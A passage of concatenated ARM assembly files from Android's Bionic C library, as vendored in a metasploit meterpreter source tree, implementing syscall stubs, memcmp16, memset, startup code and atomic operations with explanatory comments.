* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
@ void *__get_sp(void)
@ Returns the caller's stack pointer in r0. Leaf function, no clobbers.
.global __get_sp
.type __get_sp, %function
__get_sp:
mov r0, sp
bx lr
|
OpenWireSec/metasploit | 2,063 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/tkill.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* unlike our auto-generated syscall stubs, this code saves lr
on the stack, as well as a few other registers. this makes
our stack unwinder happy, when we generate debug stack
traces after the C library or other parts of the system
abort due to a fatal runtime error (e.g. detection
of a corrupted malloc heap).
*/
#include <sys/linux-syscalls.h>
#ifndef __NR_tkill
#define __NR_tkill 238 /* fallback when the kernel headers predate tkill */
#endif
.text
.type tkill, #function
.globl tkill
.align 4
@ int tkill(int tid, int sig)
@ Unlike the auto-generated stubs this one saves extra registers on the
@ stack (see the comment block above) so the stack unwinder can produce
@ a usable trace when the process is aborting.
tkill:
stmfd sp!, {r4-r7, ip, lr}
ldr r7, =__NR_tkill
swi #0
ldmfd sp!, {r4-r7, ip, lr}
movs r0, r0 @ negative result -> error
bxpl lr
b __set_syscall_errno @ sets errno and returns -1
|
OpenWireSec/metasploit | 7,302 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcmp16.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
.text
.global __memcmp16
.type __memcmp16, %function
.align 4
/*
* Optimized memcmp16() for ARM9.
* This would not be optimal on XScale or ARM11, where more prefetching
* and use of PLD will be needed.
* The 2 major optimizations here are
* (1) The main loop compares 16 bytes at a time
* (2) The loads are scheduled in a way they won't stall
*
* C-equivalent:
*   int __memcmp16(const unsigned short *a, const unsigned short *b,
*                  size_t count);   // count in half-words
* Returns 0 when equal, otherwise a[i] - b[i] for the first
* half-word that differs.
* Clobbers: r2, r3, ip, lr (lr only on the long paths), flags.
*/
__memcmp16:
.fnstart
PLD (r0, #0)
PLD (r1, #0)
/* take care of the case where length is nul or the buffers are the same */
cmp r0, r1
cmpne r2, #0
moveq r0, #0
bxeq lr
/* since r0 holds the result, move the first source
* pointer somewhere else
*/
mov r3, r0
/* make sure we have at least 12 words, this simplifies things below
* and avoids some overhead for small blocks
*/
cmp r2, #12
bpl 0f
/* small blocks (less than 12 words): plain half-word-at-a-time loop */
PLD (r0, #32)
PLD (r1, #32)
1: ldrh r0, [r3], #2
ldrh ip, [r1], #2
subs r0, r0, ip
bxne lr
subs r2, r2, #1
bne 1b
bx lr
.save {r4, lr}
/* save registers */
0: stmfd sp!, {r4, lr}
/* align first pointer to word boundary */
tst r3, #2
beq 0f
ldrh r0, [r3], #2
ldrh ip, [r1], #2
sub r2, r2, #1
subs r0, r0, ip
/* restore registers and return */
ldmnefd sp!, {r4, lr}
bxne lr
.fnend
0: /* here the first pointer is aligned, and we have at least 3 words
* to process.
*/
/* see if the pointers are congruent (same alignment modulo 4) */
eor r0, r3, r1
ands r0, r0, #2
bne 5f
/* congruent case, 16 half-words per iteration
* We need to make sure there are at least 16+2 words left
* because we effectively read ahead one long word, and we could
* read past the buffer (and segfault) if we're not careful.
*/
ldr ip, [r1] @ read-ahead word from the second buffer
subs r2, r2, #(16 + 2)
bmi 1f
0:
PLD (r3, #64)
PLD (r1, #64)
/* 8 interleaved word compares; ip/lr alternate as the read-ahead
* register so loads never stall the following eor */
ldr r0, [r3], #4
ldr lr, [r1, #4]!
eors r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
bne 2f @ some word differed: back up and re-compare it
subs r2, r2, #16
bhs 0b
/* do we have at least 2 words left? */
1: adds r2, r2, #(16 - 2 + 2)
bmi 4f
/* finish off 2 words at a time */
3: ldr r0, [r3], #4
ldr ip, [r1], #4
eors r0, r0, ip
bne 2f
subs r2, r2, #2
bhs 3b
/* are we done? */
4: adds r2, r2, #2
bne 8f
/* restore registers and return */
mov r0, #0 @ all equal
ldmfd sp!, {r4, lr}
bx lr
2: /* the last 2 words are different, restart them */
ldrh r0, [r3, #-4]
ldrh ip, [r1, #-4]
subs r0, r0, ip
ldreqh r0, [r3, #-2]
ldreqh ip, [r1, #-2]
subeqs r0, r0, ip
/* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
/* process the last few words */
8: ldrh r0, [r3], #2
ldrh ip, [r1], #2
subs r0, r0, ip
bne 9f
subs r2, r2, #1
bne 8b
9: /* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
5: /*************** non-congruent case ***************/
/* align the unaligned pointer; lr carries the read-ahead word whose
* halves are recombined with orr below */
bic r1, r1, #3
ldr lr, [r1], #4
sub r2, r2, #8
6:
PLD (r3, #64)
PLD (r1, #64)
mov ip, lr, lsr #16
ldr lr, [r1], #4
ldr r0, [r3], #4
orr ip, ip, lr, lsl #16 @ ip = unaligned 32-bit view of the second buffer
eors r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #8
bhs 6b
sub r1, r1, #2 @ undo the read-ahead over-advance
/* are we done? */
adds r2, r2, #8
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #2
b 2b
|
OpenWireSec/metasploit | 1,550 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtend.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
@ crtend: closes each array section opened by crtbegin with a single
@ zero terminator word, so runtime code can walk entries until 0.
.section .preinit_array, "aw"
.long 0
.section .init_array, "aw"
.long 0
.section .fini_array, "aw"
.long 0
.section .ctors, "aw"
.long 0
|
OpenWireSec/metasploit | 1,576 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtend_so.S | /*
* Copyright (C) 2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* This is the same as crtend.S except that a shared library
 * cannot have a .preinit_array
 */
.section .init_array, "aw"
.long 0 @ zero terminator for __INIT_ARRAY__ (see crtbegin_so)
.section .fini_array, "aw"
.long 0 @ zero terminator for __FINI_ARRAY__
|
OpenWireSec/metasploit | 2,050 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/_exit_with_stack_teardown.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <asm/unistd.h>
.text
.type _exit_with_stack_teardown, #function
.globl _exit_with_stack_teardown
.align 4
@ void _exit_with_stack_teardown(void * stackBase, int stackSize, int retCode)
@ Unmaps the calling thread's own stack, then exits. After the munmap the
@ stack must not be touched, so retCode is parked in lr across the call.
_exit_with_stack_teardown:
#if __ARM_EABI__
mov lr, r2 @ lr = retCode; survives both syscalls
ldr r7, =__NR_munmap
swi #0 @ the stack is destroyed by this call
mov r0, lr
ldr r7, =__NR_exit
swi #0
#else
mov lr, r2
swi # __NR_munmap @ the stack is destroyed by this call
mov r0, lr
swi # __NR_exit
#endif
@ exit() should never return, cause a crash if it does
mov r0, #0
ldr r0, [r0] @ deliberate NULL load -> fault
|
OpenWireSec/metasploit | 2,643 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_dynamic.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# its purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r0, sp @ r0 = kernel-supplied argument block (argc/argv/envp/auxv)
mov r1, #0 @ r1 = "onexit" hook, unused (see comment above)
adr r2, 0f @ r2 = trampoline that jumps to main
adr r3, 1f @ r3 = table of the four structor-array addresses below
b __libc_init @ never returns
0: b main
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1 @ sentinel; linker appends the real entries, crtend terminates with 0
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,472 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/__get_pc.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
@ void *__get_pc(void)
@ Returns the current program counter (as read via pc) in r0.
.global __get_pc
.type __get_pc, %function
__get_pc:
mov r0, pc
bx lr
|
OpenWireSec/metasploit | 2,093 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/syscall.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.align 4
.type syscall,#function
.globl syscall
.text
.align
@ long syscall(long number, ...)
@ Generic syscall trampoline: slides the C arguments down one slot and
@ places the syscall number where the kernel expects it, then converts
@ a negative kernel result into errno / -1.
#if __ARM_EABI__
syscall:
mov ip, sp @ ip -> caller's stack-passed args (syscall args 4..7)
stmfd sp!, {r4, r5, r6, r7}
mov r7, r0 @ EABI: syscall number goes in r7
mov r0, r1 @ shift the up-to-six syscall args into r0-r5
mov r1, r2
mov r2, r3
ldmfd ip, {r3, r4, r5, r6}
swi #0
ldmfd sp!, {r4, r5, r6, r7}
movs r0, r0 @ negative result -> error
bxpl lr
b __set_syscall_errno
#else
#ifndef __NR_syscall
#define __NR_syscall 113
#endif
syscall:
stmfd sp!, {r4, r5, lr}
ldr r4, [sp, #12] @ syscall args 4 and 5 from the caller's stack
ldr r5, [sp, #16]
swi __NR_syscall @ OABI indirect syscall: number stays in r0
ldmfd sp!, {r4, r5, lr}
movs r0, r0
bxpl lr
b __set_syscall_errno
#endif
|
OpenWireSec/metasploit | 3,435 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memset.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.global memset
.type memset, %function
.global bzero
.type bzero, %function
.align
/*
* Optimized memset() for ARM.
*
* memset() returns its first argument.
*/
@ void bzero(void *dst, size_t n): falls through to memset(dst, 0, n)
bzero:
mov r2, r1
mov r1, #0
@ void *memset(void *dst, int c, size_t n)
@ In: r0 = dst, r1 = fill byte, r2 = byte count. Out: r0 = dst.
memset:
/* compute the offset to align the destination
* offset = (4-(src&3))&3 = -src & 3
*/
.fnstart
.save {r0, r4-r7, lr}
stmfd sp!, {r0, r4-r7, lr} @ r0 is saved so it can be reloaded as the return value
rsb r3, r0, #0
ands r3, r3, #3 @ r3 = bytes needed to word-align dst
cmp r3, r2
movhi r3, r2 @ never align past the end of the buffer
/* splat r1: replicate the fill byte into all 4 bytes of r1 */
mov r1, r1, lsl #24
orr r1, r1, r1, lsr #8
orr r1, r1, r1, lsr #16
movs r12, r3, lsl #31 @ C = bit 1 of r3, N = bit 0
strcsb r1, [r0], #1 /* can't use strh (alignment unknown) */
strcsb r1, [r0], #1
strmib r1, [r0], #1
subs r2, r2, r3
ldmlsfd sp!, {r0, r4-r7, lr} /* return */
bxls lr
/* align the destination to a cache-line */
mov r12, r1 @ fill 8 registers so stmia can burst 32 bytes
mov lr, r1
mov r4, r1
mov r5, r1
mov r6, r1
mov r7, r1
rsb r3, r0, #0
ands r3, r3, #0x1C @ r3 = bytes to the next 32-byte boundary
beq 3f
cmp r3, r2
andhi r3, r2, #0x1C
sub r2, r2, r3
/* conditionally writes 0 to 7 words (length in r3) */
movs r3, r3, lsl #28
stmcsia r0!, {r1, lr}
stmcsia r0!, {r1, lr}
stmmiia r0!, {r1, lr}
movs r3, r3, lsl #2
strcs r1, [r0], #4
3:
subs r2, r2, #32
mov r3, r1
bmi 2f
1: subs r2, r2, #32 @ main loop: one 32-byte cache line per iteration
stmia r0!, {r1,r3,r4,r5,r6,r7,r12,lr}
bhs 1b
2: add r2, r2, #32
/* conditionally stores 0 to 31 bytes */
movs r2, r2, lsl #28
stmcsia r0!, {r1,r3,r12,lr}
stmmiia r0!, {r1, lr}
movs r2, r2, lsl #2
strcs r1, [r0], #4
strmih r1, [r0], #2
movs r2, r2, lsl #2
strcsb r1, [r0]
ldmfd sp!, {r0, r4-r7, lr} @ reload the original dst as the return value
bx lr
.fnend
|
OpenWireSec/metasploit | 6,225 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/atomics_arm.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.global __atomic_cmpxchg
.type __atomic_cmpxchg, %function
.global __atomic_swap
.type __atomic_swap, %function
.global __atomic_dec
.type __atomic_dec, %function
.global __atomic_inc
.type __atomic_inc, %function
#define FUTEX_WAIT 0
#define FUTEX_WAKE 1
#if 1
/* These variants use the kernel's user-mode cmpxchg helper at a fixed
 * address (kernel_cmpxchg): it is entered with r0 = oldval, r1 = newval,
 * r2 = ptr and, as used below, leaves carry clear when the store did not
 * happen — hence the bcc retry loops. The lr setup before each jump is a
 * hand-made call: lr = pc + 4 points at the instruction after the jump.
 */
.equ kernel_cmpxchg, 0xFFFF0FC0
.equ kernel_atomic_base, 0xFFFF0FFF
@ int __atomic_dec(volatile int *addr): atomic *addr -= 1, returns old value.
__atomic_dec:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r2, r0 @ r2 = addr for the kernel helper
1: @ atomic_dec
ldr r0, [r2] @ r0 = old value
mov r3, #kernel_atomic_base
add lr, pc, #4 @ return address = the bcc below
sub r1, r0, #1 @ r1 = new value
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcc 1b @ store lost a race: reload and retry
add r0, r1, #1 @ old value = new + 1
ldmia sp!, {r4, lr}
bx lr
.fnend
@ int __atomic_inc(volatile int *addr): atomic *addr += 1, returns old value.
__atomic_inc:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r2, r0
1: @ atomic_inc
ldr r0, [r2]
mov r3, #kernel_atomic_base
add lr, pc, #4
add r1, r0, #1
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcc 1b
sub r0, r1, #1 @ old value = new - 1
ldmia sp!, {r4, lr}
bx lr
.fnend
/* r0(old) r1(new) r2(addr) -> r0(zero_if_succeeded) */
